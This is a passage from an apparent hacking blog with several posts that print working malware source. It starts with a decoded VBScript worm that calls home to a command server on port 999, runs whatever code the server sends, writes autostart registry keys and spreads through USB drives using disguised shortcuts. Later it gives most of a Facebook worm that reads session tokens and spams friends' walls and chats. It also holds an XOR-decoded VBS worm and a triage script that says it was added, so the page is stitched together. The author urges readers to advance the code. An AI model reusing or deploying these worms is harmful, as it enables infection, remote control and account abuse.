115|92|67|117|114|114|101|110|116|86|101|114|115|105|111|110|92|82|117|110|92|34|32|38|32|102|110|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|100|114|32|38|32|102|110|32|44|116|114|117|101|13|10|102|115|46|68|101|108|101|116|101|70|105|108|101|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|83|104|101|108|108|46|65|112|112|108|105|99|97|116|105|111|110|34|41|46|78|97|109|101|83|112|97|99|101|40|38|72|55|41|46|83|101|108|102|46|80|97|116|104|32|38|34|92|34|32|38|32|102|110|32|44|116|114|117|101|13|10|102|111|114|32|101|97|99|104|32|120|120|32|105|110|32|102|115|46|68|114|105|118|101|115|13|10|105|102|32|120|120|46|105|115|114|101|97|100|121|32|116|104|101|110|13|10|105|102|32|12
0|120|46|70|114|101|101|83|112|97|99|101|32|62|48|32|116|104|101|110|13|10|70|111|114|32|69|97|99|104|32|120|32|73|110|32|102|115|46|71|101|116|70|111|108|100|101|114|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|41|46|70|105|108|101|115|13|10|79|110|32|69|114|114|111|114|32|82|101|115|117|109|101|32|78|101|120|116|13|10|105|102|32|105|110|115|116|114|40|120|46|110|97|109|101|44|34|46|34|41|32|116|104|101|110|13|10|105|102|32|108|99|97|115|101|40|32|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|40|85|66|111|117|110|100|40|83|112|108|105|116|40|120|46|110|97|109|101|44|32|34|46|34|41|41|41|41|60|62|34|108|110|107|34|32|116|104|101|110|13|10|120|46|65|116|116|114|105|98|117|116|101|115|32|61|32|48|13|10|105|102|32|117|99|97|115|101|40|120|46|110|97|109|101|41|32|60|62|32|117|99|97|115|101|40|102|110|41|32|116|104|101|110|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|38|32|34|46|108|110|107|34|32|41|13|10|101|108|115|101|13|10|102|115|46|100|101|108|101|116|101|102|105|108|101|40|32|120|120|46|112|97|116|104|32|38|32|34|92|34|32|38|32|120|46|110|97|109|101|32|41|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|105|102|13|10|101|110|100|32|105|102|13|10|110|101|120|116|13|10|119|115|99|114|105|112|116|46|113|117|105|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|112|111|115|116|40|99|109|100|32|44|100|97|41|13|10|112|111|115|116|61|34|34|13|10|68|105|109|32|111|13|10|83|101|116|32|111|32|61|32|67|114|101|97|116|101|79|98|106|101|99|116|40|34|77|83|88|77|76|50|46|88|77|76|72|84|84|80|34|41|13|10|111|46|111|112|101|110|32|34|80|79|83|84|34|44|34|104|116|116|112|58|47|47|34|32|38|32|104|111|115|116|32|38|32|34|58|34|32|38|32|112|111|114|116|32|38|34|47|34|32|38|32|99|109|100|44|32|102|97|108|115|101|13|10|111|46|115|101|116|82|101
|113|117|101|115|116|72|101|97|100|101|114|32|34|85|115|101|114|45|65|103|101|110|116|58|34|44|32|32|105|110|102|13|10|111|46|115|101|110|100|32|100|97|13|10|112|111|115|116|61|111|46|114|101|115|112|111|110|115|101|84|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|100|105|109|32|120|105|110|102|13|10|102|117|110|99|116|105|111|110|32|105|110|102|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|105|102|32|120|105|110|102|61|34|34|32|116|104|101|110|13|10|100|105|109|32|115|13|10|115|61|34|63|63|34|13|10|115|32|61|32|104|119|100|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|67|79|77|80|85|84|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|115|61|32|115|104|46|69|120|112|97|110|100|69|110|118|105|114|111|110|109|101|110|116|83|116|114|105|110|103|115|40|34|37|85|83|69|82|78|65|77|69|37|34|41|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|34|13|10|115|61|34|63|63|34|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|32|40|34|83|101|108|101|99|116|32|42|32|102|114|111|109|32|87|105|110|51|50|95|79|112|101|114|97|116|105|110|103|83|121|115|116|101|109|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|105|110|32|97|97|13|10|115|61|32|97|97|97|46|67|97|112|116|105|111|110|32|32|13|10|101|120|105|116|32|102|111|114|13|10|78|101|120|116|13|10|105|110|102|32|61|32|105|110|102|32|38|32|115|32|38|32|34|92|48|46|51|92|34|32|38|32|1
12|105|100|32|32|13|10|120|105|110|102|61|105|110|102|13|10|101|108|115|101|13|10|105|110|102|61|120|105|110|102|13|10|101|110|100|32|105|102|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|102|117|110|99|116|105|111|110|32|72|87|68|13|10|83|101|116|32|97|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|123|105|109|112|101|114|115|111|110|97|116|105|111|110|76|101|118|101|108|61|105|109|112|101|114|115|111|110|97|116|101|125|33|92|92|46|92|114|111|111|116|92|99|105|109|118|50|34|41|13|10|83|101|116|32|97|97|32|61|32|97|46|69|120|101|99|81|117|101|114|121|40|34|83|69|76|69|67|84|32|42|32|70|82|79|77|32|87|105|110|51|50|95|76|111|103|105|99|97|108|68|105|115|107|34|41|13|10|70|111|114|32|69|97|99|104|32|97|97|97|32|73|110|32|97|97|13|10|105|102|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|60|62|34|34|32|116|104|101|110|13|10|72|87|68|61|32|97|97|97|46|86|111|108|117|109|101|83|101|114|105|97|108|78|117|109|98|101|114|13|10|101|120|105|116|32|102|111|114|13|10|101|110|100|32|105|102|13|10|78|101|120|116|13|10|101|110|100|32|102|117|110|99|116|105|111|110|13|10|13|10|70|117|110|99|116|105|111|110|32|80|73|68|13|10|80|73|68|61|48|13|10|111|110|32|101|114|114|111|114|32|114|101|115|117|109|101|32|110|101|120|116|13|10|80|73|68|32|61|32|71|101|116|79|98|106|101|99|116|40|34|119|105|110|109|103|109|116|115|58|114|111|111|116|92|99|105|109|118|50|34|41|46|71|101|116|40|34|87|105|110|51|50|95|34|32|38|95|13|10|34|80|114|111|99|101|115|115|46|72|97|110|100|108|101|61|39|34|32|38|32|95|13|10|115|104|46|69|120|101|99|40|34|109|115|104|116|97|46|101|120|101|34|41|46|80|114|111|99|101|115|115|73|68|32|38|32|34|39|34|41|46|80|97|114|101|110|116|80|114|111|99|101|115|115|73|100|13|10|69|110|100|32|70|117|110|99|116|105|111|110|";

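# $HOUDINI holds the pipe-separated decimal character codes shown above
@f = split /\|/, $HOUDINI;

# each field is one character code; print the character it stands for
foreach $ch (@f) {
    print chr($ch);
}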

Perl is amazing :)

And here, ladies and gentle ducks, is the decoded code. I have
formatted it to make it easier to read.

It's a real VBS virus/worm, please be careful.

'<[ coded bY njq8 ]>'
On Error Resume Next

dim sh ' shell
set sh = WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs = CreateObject("Scripting.FileSystemObject") 
dim host
host = "cupidon.zapto.org"
dim port
port = 999
dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
dim FN
FN = "Servieca.vbs"
dim fh
dim us
us = "~"
ins
dim spl
spl = "jnJnj"
dim i
i = 0

while true
dim a
a = ""
a = split(post("ready", ""), spl)
select case a(0)
case "exc"
dim sa
sa = a(1)
execute sa
case "uns"
uns
end select

wscript.sleep 4000
i = i + 1
if i> 2 then
i = 0
xins
end if
wend

function ins
on error resume next
us= sh.regread("HKCU\njq8")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" &  lcase(fn) then
us="y"
sh.regwrite "HKCU\njq8",  us, "REG_SZ"
else
us="n"
sh.regwrite "HKCU\njq8",  us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if  Err.Number>0 then
wscript.quit
end if
xins
end function

sub xins
on error resume next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
fs.copyfile wscript.scriptfullname,  CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
' Removable drive
if xx.drivetype=1 then
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\"  & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\"  & fn,true
For Each x In fs.GetFolder( xx.path & "\" ).Files
wscript.sleep 1
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 2
if ucase(x.name) <> ucase(fn) then
With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk") 
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
.IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
end if
end if
end if
next
Err.Clear
end sub

function uns
on error resume next
fh.close
sh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
sh.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
fs.DeleteFile dr & fn ,true
fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
For Each x In fs.GetFolder( xx.path & "\").Files
On Error Resume Next
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 0
if ucase(x.name) <> ucase(fn) then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
else
fs.deletefile( xx.path & "\" & x.name )
end if
end if
end if
Next
end if
end if
next
wscript.quit
end function

function post(cmd ,da)
post = ""
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "POST","http://" & host & ":" & port &"/" & cmd, false
o.setRequestHeader "User-Agent:",  inf
o.send da
post = o.responseText
end function

dim xinf
function inf
on error resume next
if xinf="" then
dim s
s = "??"
s = hwd
inf = inf & s & "\"
s = "??"
s = sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
inf = inf & s & "\"
s = "??"
s = sh.ExpandEnvironmentStrings("%USERNAME%")
inf = inf & s & "\"
s = "??"
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
For Each aaa in aa
s = aaa.Caption  
exit for
Next
inf = inf & s & "\0.3\" & pid  
xinf = inf
else
inf = xinf
end if
end function

function HWD
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
For Each aaa In aa
if aaa.VolumeSerialNumber<>"" then
HWD = aaa.VolumeSerialNumber
exit for
end if
Next
end function

Function PID
PID = 0
on error resume next
PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
"Process.Handle='" & _
sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
End Function

To keep a list of infected systems, njq8's script sends "ready" calls to
cupidon.zapto.org on port 999.


Enjoy, and wicked hacking.
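
The same decoding step for triage, extended to pull out what a responder needs from the decoded script (C2 host and port, registry values written, whether it runs server-supplied code). This is an added example, not code from the original post: the function names are hypothetical and the sample input is a constructed fragment modelled on the script above, with a placeholder host.

```python
import re

def encode_charcodes(text, sep="|"):
    """Encode text the way the dropper stores it: decimal codes, trailing separator."""
    return sep.join(str(ord(c)) for c in text) + sep

def decode_charcodes(blob, sep="|"):
    """Decode 'NN|NN|...' back to text.

    Whitespace is removed first because a pasted blob is often hard-wrapped in
    the middle of a number ("1\\n12" is really 112). Empty fields are skipped;
    a non-numeric or out-of-range field raises ValueError instead of being
    silently dropped, so a truncated sample is noticed.
    """
    compact = re.sub(r"\s+", "", blob)
    chars = []
    for pos, field in enumerate(compact.split(sep)):
        if field == "":
            continue
        code = int(field)  # ValueError on non-numeric input
        if not 0 <= code <= 255:
            raise ValueError("field %d out of range: %r" % (pos, field))
        chars.append(chr(code))
    return "".join(chars)

def triage(script_text):
    """Extract indicators from a decoded VBScript of this family."""
    host = re.search(r'(?im)^\s*host\s*=\s*"([^"]+)"', script_text)
    port = re.search(r'(?im)^\s*port\s*=\s*(\d+)', script_text)
    reg = re.findall(r'(?i)regwrite\s+"([^"]+)"', script_text)
    return {
        "c2_host": host.group(1) if host else None,
        "c2_port": int(port.group(1)) if port else None,
        "registry_writes": sorted(set(reg)),
        # autostart via the Run key, as in the xins routine
        "run_key_persistence": any("\\currentversion\\run" in r.lower() for r in reg),
        # an 'execute' statement means the server can push arbitrary VBScript
        "runs_server_supplied_code": bool(re.search(r"(?im)^\s*execute\b", script_text)),
    }

# Constructed sample (not the real dropper): same structure, placeholder values.
SAMPLE_VBS = "\r\n".join([
    'host = "c2.example.invalid"',
    "port = 999",
    'FN = "sample.vbs"',
    r'sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, dr & fn, "REG_SZ"',
    'a = split(post("ready", ""), spl)',
    "execute a(1)",
])

def wrapped_sample_blob(width=64):
    """Encode the sample and hard-wrap it, which splits some numbers across lines."""
    enc = encode_charcodes(SAMPLE_VBS)
    return "\n".join(enc[i:i + width] for i in range(0, len(enc), width))

if __name__ == "__main__":
    decoded = decode_charcodes(wrapped_sample_blob())
    for key, value in triage(decoded).items():
        print("%-26s %s" % (key, value))
```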

2012/06/26

dot nerd is mine, dot geek is mine. Leading the nerdom to Freedom

Hi

Long time no blog :D, I have been having a fantastic, awesomest time. To recap, I'm now married (surprised? :)
and I have a son, a handsome little hacker, and he *loves* OpenBSD and likes drooling on
mummy's laptop.

Anyway, I have been messing with BIND for a while now and I must say, if you don't play with
this before you die, you would *die* in vain. I have researched making the web faster in .gh.
DNS may seem like a very small performance upgrade, and many argue that there is the Google DNS. Well,
apart from the fact that it sucks and can be a very dangerous tracking tool, how would hackers like
myself ever learn the sweet hardcore *very* fundamental intertube laws? huh huh!

Now, on my travels through named(8), named.conf(5), rndc(8), etc. I thought of an idea I had
in 2009: to create a TLD called .nerd, free for all teh nerds in the world. Then I was told that some one(s)
is controlling some root servers, ICANN bastards. Anyway, I thought to myself: how do I, laudarch,
make my fellow nerds and geeks share their own custom domain names? Well, I bought two IPs and
the source was with me.

So today I present you with two DNS IP addresses that ye *must* use in order to follow this order.
Use these as your resolvers; they are a little faster than Google's 8.8.8.8 and 8.8.4.4, at least from Ghana, and I have
tried almost all the ISPs. You can also resolve .nerd and .geek TLD names. If you have DNS servers, please
forward your .nerds to my servers, as they are the parent now.

The IPs are
72.52.97.76
72.52.97.109

Please try these and let me know if you like them, or about any issues you are facing or ideas you have. Registration of .nerd names will be up in about a week from now; please check http://qremiaevolution.org for more info.

To test the DNS once you have added the IPs to your systems, try accessing
http://laudarch.nerd and http://laudarch.geek. Should you want to use the .nerd and .geek nameservers, use
ns1.nerd
ns2.nerd
OR
ns1.geek
ns2.geek


laterz

REMEMBER TO FORWARD .NERD AND .GEEK

2011/11/19

Commercial Coding Pt2

Well, as the title says, this is in reference to my old blog post about coding commercially. Well, it sucks. I have to deal with .NET/C#, VB.NET and Java; I wake in the middle of the night screaming "no no, not the VM, please let me talk to the hardware, please". I'm scaring the shit out of my wife, and my mum is getting pissed 'cause I'm always on her Windows desktop, reversing something or making some guy or company happy with .NET :/ Anyway, it's shit.

2011/07/22

Reversing the 'yunyun.vbs' virus

Hello, I have been bored, tired and coding :) as usual. I got a pen drive some time last
year and I realized there were too many 'Thumb.db' files, so I ran vi Thumb.db
and guess what I saw:
'www.muslimah.or.id;==================================== my name:Yuyun 1.0

' ============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then...

Yes, that is the yunyun alright, coded in Microsoft VBS. Then I got interested
in the encrypted part of the code; I wanted to see what's in there.
The encryption and decryption routine uses XOR, which means it's the same
algorithm in and out. Here is the en/decryption routine:

hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next

As you can see this is very simple, so I wrote a little Perl script to decrypt it:

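#!/usr/bin/perl

use strict;
use warnings;

my $vir = '';
my @vx;
my $line = 0;
my $i;

# read-only is enough; keep everything from line 47 onwards
open (VIR, "<yunyun.vbs") || die("noopeno :(");
while (<VIR>) {
  $line++;
  if ($line >= 47) {
    $vir .= $_;
  }
}
close (VIR);

# split into single characters; an empty pattern keeps the spaces,
# which / */ would swallow (a space decodes to an apostrophe)
@vx = split(//, $vir);

# XOR every character with 7, the same operation the worm uses
foreach $i (@vx) {
  print chr(ord($i) ^ 7);
}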

I have made it simpler so anyone can learn from it.
Anyway, with that the mystery was unveiled, and then came mystery 2:
there's a part that needs formatting, and this virus/worm is really cool at handling
newlines. Anyway, you need to format it and then translate it. Here's the code to format it:

$adv = 'Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^!  www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-Araf:26)';


$adv =~ s/\>/\n/go;

print $adv;


OK, so uhm, that's that. I have more virii/worms, but take this for starters.
Oh, and if anyone has the 'stuxnet' worm, please let me have a binary copy
in tar.gz format.

Next time.

2011/05/06

Facebook Worm

Hello, it's been really long and a lot of things have happened; anyway, I will tell you about that later.

What I want to talk about now is a Facebook worm I got a couple of days ago.
I received a mail from a Facebook friend and it had a very suspicious title:


"
This will leave you speechless)
http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791
Osama Bin Laden EXECUTION Video!
Navy Seals raid Bin Ladens hideout and execute him!
"

Weird huh, even CNN didn't show a video, so how come this group has it?
The page has since been removed. It's funny when these things happen
and people fall for it anyway. It had instructions to copy and paste JavaScript
code into your address bar after you are logged in to Facebook.

The interesting thing about this worm is how it spreads:
it uses the "stupidity" of humans. Yes, stupidity!

I and my brother tried designing a worm on Facebook once and we came up
with different algorithms on how to spread using apps, mailing
and posting comments, and all this could not be automatic; I even came up
with Mozilla extensions to do the job.


The future of worms and viruses is social networking. I watched as the group
grew from 8,000 to 60,000+ in less than two hours. Now that is power; given the
intelligence of the average joe and jane, this would work for the next 10 to 15
years.

I copied the JavaScript code that spread on the victim's wall and profile to the
victim's friends et al.

Below is the code; learn from it, advance it and be wise :)


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
 
 var nameEQ = name + "=";
 var ca = document.cookie.split(';');
 for(var i=0;i < ca.length;i++) {
  var c = ca[i];
  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
 }
 return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
      "http://ow.ly/4LNpd",
      "http://clickily.ws/zyaeom"
     );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Bin-Laden-Execution-Video/207043242659899?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

 if(http1.readyState == 4 && http1.status == 200) { // If state = success
  
  var response1 = http1.responseText;
  
  response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  response1 = JSON.parse(response1); // Convert the response to JSON
  
  //alert(response4.toSource());
  
  var count = 0;
  
  for(uid in response1.payload.entries){
   
   if(count < 400){
    
    //alert("SENT TO "+response1.payload.entries[count].uid);

    // Loop to send messages
   
    // New XMLHttp object
    var httpwp = new XMLHttpRequest();
       
    var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
    var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-Execution-Video/219092901450281?", "http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791?");
    var statusmessage="This will leave you speechless";
    var title="Osama Bin Laden EXECUTION Video!";
//    var link="http://clickily.ws/e4lqeg?http://clickily.ws/y2ls36?";
    var link = randLink[Math.floor(randLink.length*Math.random())];
    var description="Navy Seals raid Bin Ladens hideout and execute him! ";
    var picture="http://cooldadssz.co.cc/laden.png";
    
    var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
    
    httpwp.open("POST", urlwp, true);
    
    //Send the proper header information along with the request
    
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");     
    
    httpwp.onreadystatechange = function() { //Call a function when the state changes.
     if(httpwp.readyState == 4 && httpwp.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }

    }

    httpwp.send(paramswp);
 
   }

   count++; // increment counter
  
  }
    
  http1.close; // Close the connection
  
  
  
 }
 
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
 if(http3.readyState == 4 && http3.status == 200) {
  
  var response3 = http3.responseText;
  
  response3 = response3.replace("for (;;);", "");
  response3 = JSON.parse(response3);
  
  var count = 0;
  
  for(property in response3.payload.buddy_list.nowAvailableList){
   
   if(count < 100){
    
    // Loop to send messages
   
    // New XMLHttp object
    var httpc = new XMLHttpRequest();
    
    // Generate random message ID
        
    var msgid = Math.floor(Math.random()*1000000);
    
    var time = Math.round(new Date().getTime() / 1000);
    
    var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
    var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
    httpc.open("POST", urlc, true);
    
    //Send the proper header information along with the request
    httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpc.setRequestHeader("Content-length", paramsc.length);
    httpc.setRequestHeader("Connection", "close");
    
    httpc.onreadystatechange = function() { //Call a function when the state changes.
     if(httpc.readyState == 4 && httpc.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }
    }
    httpc.send(paramsc);
 
   }
   
   //alert(property);
   count++; // increment counter
  
  }
  
  http3.close; // Close the connection
  
 }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
 if(http4.readyState == 4 && http4.status == 200) {
   
  http4.close; // Close the connection
  
 }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

